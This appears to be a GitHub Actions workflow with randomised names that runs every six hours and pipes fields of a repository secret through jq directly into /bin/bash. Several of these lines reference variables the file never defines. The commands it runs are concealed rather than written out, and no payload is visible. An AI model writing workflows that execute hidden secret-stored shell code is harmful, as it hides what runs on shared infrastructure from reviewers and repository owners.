name: liangyizhi3178

on:
  workflow_dispatch:
  schedule:
    - cron: '35 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liangyizhi3178
        env:
          qjte13: ${{ secrets.qjte13 }}
        run: |
          echo $qjte13 | jq -r .bahlm0 | /bin/bash
          echo $mk761 | jq -r .zsgm00 | /bin/bash
          echo $k38 | jq -r .a1 | /bin/bash
          echo $lo46385 | jq -r .dzbx48922 | /bin/bash
          echo $dfxmr58 | jq -r .zf503 | /bin/bash
          echo $ch0 | jq -r .kgqaz00871 | /bin/bash

